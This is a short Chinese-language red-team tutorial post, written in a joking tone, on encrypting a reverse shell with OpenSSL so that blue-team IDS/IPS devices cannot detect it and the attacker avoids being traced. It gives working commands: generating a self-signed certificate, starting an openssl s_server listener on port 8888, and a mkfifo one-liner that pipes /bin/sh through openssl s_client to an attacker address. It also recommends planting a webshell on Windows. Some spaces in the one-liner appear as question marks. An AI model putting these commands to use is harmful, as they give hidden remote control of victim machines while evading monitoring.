某天一位紅隊大佬在進行滲透測試中遇到了一個shiro反序列化漏洞,正高興的反彈shell時、總是反彈后馬上掉shell，并且ip直接被封禁。這時旁邊一位有20年經(jīng)驗的紅隊大佬站出來說:你個憨批！藍隊有IDS/IPS/態(tài)勢肝汁等等設備你不加密下你就彈？媽的趕緊關(guān)服務器吧別被溯源個屁的。

OpenSSL 簡介：

  在計算機網(wǎng)絡上，OpenSSL 是一個開放源代碼的軟件庫包，應用程序可以使用這個包來進行安全通信，避免竊聽，同時確認另一端連接者的身份

未加密前數(shù)據(jù)：

攻擊服務IP：8.210.XX.XXX(紅隊執(zhí)行危險命令)

受害主機：192.168.XX.XX(抓包分析)

不加密就跟裸奔一樣......

加密實現(xiàn)過程：

1、首先生成自簽名證書，輸入的時候默認回車即可：

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

2、服務端監(jiān)聽8888端口：

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

Linux下使用mkfifo進行反彈shell：

mkfifo?/tmp/s;?/bin/sh?-i?<?/tmp/s?2>&1?|?openssl?s_client?-quiet?-connect?Your?ip:Your?port>?/tmp/s;?rm?/tmp/s

紅隊：反彈shell成功，就這！

藍隊：紅隊太強了肝不過呀，設備不行太辣雞了，草！睡覺

windows不推薦使用此方法，建議直接寫webshell